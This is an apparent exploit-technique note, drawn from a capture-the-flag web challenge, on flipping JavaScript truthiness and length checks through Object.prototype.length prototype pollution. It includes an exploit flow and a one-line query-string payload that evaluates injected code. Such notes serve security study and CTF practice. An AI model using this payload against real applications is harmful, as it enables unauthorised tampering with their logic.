pwneglyph logo

Note

web javascript prototype-pollution logic-bug truthiness

Flip a branch like (v ? 0 : v.length) by setting an inherited length through prototype pollution.

Truthy / Falsy Logic Bug + Object.prototype.length Pollution

The vulnerable expression trusts JS truthiness and property lookup more than it should. By setting an inherited length, a branch that seemed to depend on a "missing length" becomes attacker-controlled.

Why It Works

  • length resolves up the prototype chain, so polluting Object.prototype.length changes the branch even for values that have no own length.

Vulnerable Pattern

  • Expressions like (v ? 0 : v.length), shorthand truthiness checks, or use of length on values that may not be arrays/strings.

Exploit Flow

  1. Identify the exact value type reaching the check and whether prototype lookup is still in play.
  2. Set Object.prototype.length (or another inherited property) through the allowed code-evaluation surface.
  3. Re-run the check and observe the branch flip.

Variations

  • Inherited valueOf, toString, constructor, or other fields used implicitly in logic checks.

Common Blockers

  • Code running in a frozen realm, a strict sandbox removing prototype mutation, or the checked value being a primitive with a different access path.

PoC Sketch

/api/check?v=!Object.prototype.length=1

Good Situations To Use It

  • A branch relies on truthiness/length of an untyped value.
  • You can pollute Object.prototype.
  • The realm isn't frozen.

Sources

  • labossi_2026/web/how_well_do_you_know_js